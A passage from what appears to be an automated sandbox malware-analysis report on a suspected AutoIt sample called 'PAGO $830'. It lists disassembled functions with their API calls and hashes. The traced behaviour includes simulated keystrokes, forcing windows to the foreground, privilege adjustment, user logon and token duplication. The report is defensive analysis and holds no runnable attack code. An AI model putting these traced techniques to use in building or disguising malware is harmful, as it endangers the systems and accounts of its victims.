                                                            • Part of subcall function 00D76832: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00D7687F,?,00E41418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00D7683E
                                                            • Part of subcall function 00D76832: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00D76850
                                                            • Part of subcall function 00D76832: FreeLibrary.KERNEL32(00000000,?,?,00D7687F,?,00E41418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00D76862
                                                          • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00E41418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00D7689F
                                                            • Part of subcall function 00D767FB: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00DB488B,?,00E41418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00D76804
                                                            • Part of subcall function 00D767FB: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00D76816
                                                            • Part of subcall function 00D767FB: FreeLibrary.KERNEL32(00000000,?,?,00DB488B,?,00E41418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00D76829
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Library$Load$AddressFreeProc
                                                          • String ID:
                                                          • API String ID: 2632591731-0
                                                          • Opcode ID: 63de4b15af36960fb526fb3c1fd3fb9ff24f04dc4ec0c90d3317caaef8d1002a
                                                          • Instruction ID: 2b9516a9e22be38f7f0c00f11aab8dd54b63c73d2cf746cd5e42f66e74dc2f1b
                                                          • Opcode Fuzzy Hash: 63de4b15af36960fb526fb3c1fd3fb9ff24f04dc4ec0c90d3317caaef8d1002a
                                                          • Instruction Fuzzy Hash: BB11C132600A15AACB14FB74C802AAD77A5DF44B10F20C42DF58AA61C2FB70DA469BB1
                                                          Function 00DA83A2 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: __wsopen_s
                                                          • String ID:
                                                          • API String ID: 3347428461-0
                                                          • Opcode ID: d9d9fc392c73133d764bbc516f76edbd66dd28b67bfba41c3bcd6dd76a6bbb5c
                                                          • Instruction ID: 6c2314b46c40b04f87e14806ff9313249d26a5fefa3a721fd76798a88d8007c3
                                                          • Opcode Fuzzy Hash: d9d9fc392c73133d764bbc516f76edbd66dd28b67bfba41c3bcd6dd76a6bbb5c
                                                          • Instruction Fuzzy Hash: D51148B190420AAFCF05DF98E94099A7BF5EF49300F144469FC08AB311DB31DA159BA5
                                                          Function 00DA4F90 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00DA4C0D: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00DA2DB9,00000001,00000364,?,00D8FD75,?,?,00D7B63D,00000000,?,?), ref: 00DA4C4E
                                                          • _free.LIBCMT ref: 00DA4FFC
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: AllocateHeap_free
                                                          • String ID:
                                                          • API String ID: 614378929-0
                                                          • Opcode ID: fe2375e0b059a0063ab653ef551284137b3b50292f0894cee7ac2f903fc38670
                                                          • Instruction ID: b44f0acec0656d5ded30593e333cda886b7b8f1b44320c8b54b2dab42a26f851
                                                          • Opcode Fuzzy Hash: fe2375e0b059a0063ab653ef551284137b3b50292f0894cee7ac2f903fc38670
                                                          • Instruction Fuzzy Hash: B30126722043056FE3218E698845A5AFBE9EFCA370F25061DE58483280EA70A805CB74
                                                          Function 00D9E592 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b57b235cd232fbdcd3a3528690b4d16ba240885f741f3b82b206d8d3beab0f09
                                                          • Instruction ID: 247119b1621df2eaaa0ebd5a56de23a0255887893a23e6ce06faf41edb1a24a0
                                                          • Opcode Fuzzy Hash: b57b235cd232fbdcd3a3528690b4d16ba240885f741f3b82b206d8d3beab0f09
                                                          • Instruction Fuzzy Hash: B0F028326056209ADF317A6ADC05B5A7798DF83338F160B15F865931C1EFB0D90286B5
                                                          Function 00DA4C0D Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00DA2DB9,00000001,00000364,?,00D8FD75,?,?,00D7B63D,00000000,?,?), ref: 00DA4C4E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: AllocateHeap
                                                          • String ID:
                                                          • API String ID: 1279760036-0
                                                          • Opcode ID: 2dd9b924b71ab63900cac366d9ed63fe63b6fb97000c1eee79cc8893a92fe49b
                                                          • Instruction ID: 1f394d712f4411b451be4d466ac7caf44a1052afe56c1eb6efffe831e08f739e
                                                          • Opcode Fuzzy Hash: 2dd9b924b71ab63900cac366d9ed63fe63b6fb97000c1eee79cc8893a92fe49b
                                                          • Instruction Fuzzy Hash: A0F0BE31A472246ADF216F639D05F5A7798EFC3BB0B198126B91DEB181CAE0D80186B1
                                                          Function 00DA37B0 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(00000000,?,00000001,?,00D8FD75,?,?,00D7B63D,00000000,?,?,?,00DE106C,00E0D0D0,?,00DB242E), ref: 00DA37E2
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: AllocateHeap
                                                          • String ID:
                                                          • API String ID: 1279760036-0
                                                          • Opcode ID: d0bbfdb6f4dcb4edd628830a87cafc28e38b3c536f8607184b55dce9ed8f4c7c
                                                          • Instruction ID: 2f1b10cf61c834a7852f34bc75c74cba17c10026a017d5ad3a0744fe65090ec0
                                                          • Opcode Fuzzy Hash: d0bbfdb6f4dcb4edd628830a87cafc28e38b3c536f8607184b55dce9ed8f4c7c
                                                          • Instruction Fuzzy Hash: 1BE06DF26052256BEB212B679C05F5A3A5AEF437F0F6A0521BC45E6891EB21CE4186F0
                                                          Function 00D768DB Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • FreeLibrary.KERNEL32(?,?,00E41418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00D7690F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: FreeLibrary
                                                          • String ID:
                                                          • API String ID: 3664257935-0
                                                          • Opcode ID: 9a423539f8d3b5eeceebc4bbe8c821b964189494392b7f5eecb9f902df243b89
                                                          • Instruction ID: 7ab7d94ce871b2d10c7553650b31acec97cbd0df6349ed5a13836e5cbb510ff2
                                                          • Opcode Fuzzy Hash: 9a423539f8d3b5eeceebc4bbe8c821b964189494392b7f5eecb9f902df243b89
                                                          • Instruction Fuzzy Hash: 4EF03075105B12CFCB349F65D494852B7F4EF14315324CA3EE2DA92650E732D884DF21
                                                          Function 00D747D0 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00D747EF
                                                            • Part of subcall function 00D784E7: _wcslen.LIBCMT ref: 00D784FA
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: LongNamePath_wcslen
                                                          • String ID:
                                                          • API String ID: 541455249-0
                                                          • Opcode ID: b2528f1641398d7695a15366b07ffeeb9214b8baf86d756291e0af93de133078
                                                          • Instruction ID: b0f272f3b5f4f9f5a50ee0c7fa94cc985ce23dd9f0c652318f99e4a37814a43a
                                                          • Opcode Fuzzy Hash: b2528f1641398d7695a15366b07ffeeb9214b8baf86d756291e0af93de133078
                                                          • Instruction Fuzzy Hash: 08E0CD769002245BC72093D89C05FDA77DEDFC8790F044175FC09D7254DD60ED8085B0
                                                          Function 00DB033B Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateFileW.KERNELBASE(00000000,00000000,?,00DB06A5,?,?,00000000,?,00DB06A5,00000000,0000000C), ref: 00DB0358
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: CreateFile
                                                          • String ID:
                                                          • API String ID: 823142352-0
                                                          • Opcode ID: 9e247a467790ae1cabc5d06c3cd021d99ac70a8b9e85c10e109db1e9c7f47101
                                                          • Instruction ID: 206029e4bd219b0a3caa76f2a094b7108fb2c6bc57e44eb7dd252a0a5274b61e
                                                          • Opcode Fuzzy Hash: 9e247a467790ae1cabc5d06c3cd021d99ac70a8b9e85c10e109db1e9c7f47101
                                                          • Instruction Fuzzy Hash: 2AD06C3204010DBFDF028F85DD06EDA3BAAFB48714F114100BE5866020C732E861AB90
                                                          Function 013C0CF8 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • Sleep.KERNELBASE(000001F4), ref: 013C0D09
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046765974.00000000013BE000.00000040.00000020.00020000.00000000.sdmp, Offset: 013BE000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_13be000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Sleep
                                                          • String ID:
                                                          • API String ID: 3472027048-0
                                                          • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                          • Instruction ID: 130318511173d5554d6de6ed98603185a40d12e61c61d6e162dd9169e2ff3849
                                                          • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                          • Instruction Fuzzy Hash: BAE0E67494010DDFDB00DFB4D54D69D7BF4EF04702F100165FD01D2280D6309D508A62

                                                          Non-executed Functions

                                                          Function 00E09468 Relevance: 74.1, APIs: 39, Strings: 3, Instructions: 625windowkeyboardCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00D8B021: GetWindowLongW.USER32(?,000000EB), ref: 00D8B032
                                                          • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00E0950C
                                                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00E0954D
                                                          • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 00E09591
                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00E095BB
                                                          • SendMessageW.USER32 ref: 00E095E4
                                                          • GetKeyState.USER32(00000011), ref: 00E0967D
                                                          • GetKeyState.USER32(00000009), ref: 00E0968A
                                                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00E096A0
                                                          • GetKeyState.USER32(00000010), ref: 00E096AA
                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00E096DB
                                                          • SendMessageW.USER32 ref: 00E09702
                                                          • SendMessageW.USER32(?,00001030,?,00E07D85), ref: 00E0980A
                                                          • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00E09820
                                                          • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00E09833
                                                          • SetCapture.USER32(?), ref: 00E0983C
                                                          • ClientToScreen.USER32(?,?), ref: 00E098A1
                                                          • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00E098AE
                                                          • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00E098C8
                                                          • ReleaseCapture.USER32 ref: 00E098D3
                                                          • GetCursorPos.USER32(?), ref: 00E0990B
                                                          • ScreenToClient.USER32(?,?), ref: 00E09918
                                                          • SendMessageW.USER32(?,00001012,00000000,?), ref: 00E09972
                                                          • SendMessageW.USER32 ref: 00E099A0
                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 00E099DD
                                                          • SendMessageW.USER32 ref: 00E09A0C
                                                          • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00E09A2D
                                                          • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00E09A3C
                                                          • GetCursorPos.USER32(?), ref: 00E09A5A
                                                          • ScreenToClient.USER32(?,?), ref: 00E09A67
                                                          • GetParent.USER32(?), ref: 00E09A85
                                                          • SendMessageW.USER32(?,00001012,00000000,?), ref: 00E09AEC
                                                          • SendMessageW.USER32 ref: 00E09B1D
                                                          • ClientToScreen.USER32(?,?), ref: 00E09B76
                                                          • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00E09BA6
                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 00E09BD0
                                                          • SendMessageW.USER32 ref: 00E09BF3
                                                          • ClientToScreen.USER32(?,?), ref: 00E09C40
                                                          • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00E09C74
                                                            • Part of subcall function 00D8ADC4: GetWindowLongW.USER32(?,000000EB), ref: 00D8ADD2
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00E09CF7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
                                                          • String ID: @GUI_DRAGID$F$p#
                                                          • API String ID: 3429851547-638943876
                                                          • Opcode ID: 2d7a829b87daab671a0a9514d07afe6224f26cc4f4de2dea5d9fd25cf2a4d3b7
                                                          • Instruction ID: 557f4d1781ae30147401beaff31c55ac273f3e743cd77950eed2327e4024fab4
                                                          • Opcode Fuzzy Hash: 2d7a829b87daab671a0a9514d07afe6224f26cc4f4de2dea5d9fd25cf2a4d3b7
                                                          • Instruction Fuzzy Hash: 6E42D034604200AFDB25CF65CC44BAABBE5FF89314F105619F695A72E2C732E895CF62
                                                          Function 00E047A8 Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 566windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 00E04828
                                                          • SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 00E0483D
                                                          • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00E0485C
                                                          • SendMessageW.USER32(?,00000148,00000000,00000000), ref: 00E04880
                                                          • SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 00E04891
                                                          • SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 00E048B0
                                                          • SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 00E048E3
                                                          • SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 00E04909
                                                          • SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 00E04944
                                                          • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00E0498B
                                                          • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00E049B3
                                                          • IsMenu.USER32(?), ref: 00E049CC
                                                          • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00E04A27
                                                          • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00E04A55
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00E04AC9
                                                          • SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 00E04B18
                                                          • SendMessageW.USER32(00000000,00001001,00000000,?), ref: 00E04BB7
                                                          • wsprintfW.USER32 ref: 00E04BE3
                                                          • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00E04BFE
                                                          • GetWindowTextW.USER32(?,00000000,00000001), ref: 00E04C26
                                                          • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00E04C48
                                                          • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00E04C68
                                                          • GetWindowTextW.USER32(?,00000000,00000001), ref: 00E04C8F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
                                                          • String ID: %d/%02d/%02d
                                                          • API String ID: 4054740463-328681919
                                                          • Opcode ID: 2eaafb7d15761abc3f29be9bff4edaead88857f3c802c4fa544b8f6b9647012d
                                                          • Instruction ID: 0361c85a895ddd26872d1124d0a8b1a6e8ee8c8deb09a67d788dbb733540df73
                                                          • Opcode Fuzzy Hash: 2eaafb7d15761abc3f29be9bff4edaead88857f3c802c4fa544b8f6b9647012d
                                                          • Instruction Fuzzy Hash: CB1202F1500204AFEB249F29CE49FAE7BE8EF45714F105629FA15FA1D0DB719981CB60
                                                          Function 00D8EFAD Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131threadkeyboardwindowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 00D8EFB7
                                                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00D8EFD4
                                                          • IsIconic.USER32(00000000), ref: 00D8EFDD
                                                          • SetForegroundWindow.USER32(00000000), ref: 00D8EFEF
                                                          • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00D8F005
                                                          • GetCurrentThreadId.KERNEL32 ref: 00D8F00C
                                                          • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00D8F018
                                                          • AttachThreadInput.USER32(?,00000000,00000001), ref: 00D8F029
                                                          • AttachThreadInput.USER32(?,00000000,00000001), ref: 00D8F031
                                                          • AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 00D8F039
                                                          • SetForegroundWindow.USER32(00000000), ref: 00D8F03C
                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00D8F055
                                                          • keybd_event.USER32(00000012,00000000), ref: 00D8F060
                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00D8F06A
                                                          • keybd_event.USER32(00000012,00000000), ref: 00D8F06F
                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00D8F078
                                                          • keybd_event.USER32(00000012,00000000), ref: 00D8F07D
                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00D8F087
                                                          • keybd_event.USER32(00000012,00000000), ref: 00D8F08C
                                                          • SetForegroundWindow.USER32(00000000), ref: 00D8F08F
                                                          • AttachThreadInput.USER32(?,000000FF,00000000), ref: 00D8F0AD
                                                          • AttachThreadInput.USER32(?,00000000,00000000), ref: 00D8F0B5
                                                          • AttachThreadInput.USER32(00000000,000000FF,00000000), ref: 00D8F0BD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Thread$Window$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconic
                                                          • String ID: Shell_TrayWnd
                                                          • API String ID: 1155518417-2988720461
                                                          • Opcode ID: 4061e73147081e0ce04afdcc64553227f0c48ead01d092bbbccb050781fb8208
                                                          • Instruction ID: 3ae2e555933324b836743fe640af1437dc29ade7659882d8d2d1653b06589110
                                                          • Opcode Fuzzy Hash: 4061e73147081e0ce04afdcc64553227f0c48ead01d092bbbccb050781fb8208
                                                          • Instruction Fuzzy Hash: 22315071A40218BEEB302BB65C4AFBF7E6DEB44B50F240126FA01F61D1D6B25D40AB71
                                                          Function 00DD1145 Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 241COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00DD1607: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00DD1651
                                                            • Part of subcall function 00DD1607: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00DD167E
                                                            • Part of subcall function 00DD1607: GetLastError.KERNEL32 ref: 00DD168E
                                                          • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00DD11CA
                                                          • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 00DD11EC
                                                          • CloseHandle.KERNEL32(?), ref: 00DD11FD
                                                          • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00DD1215
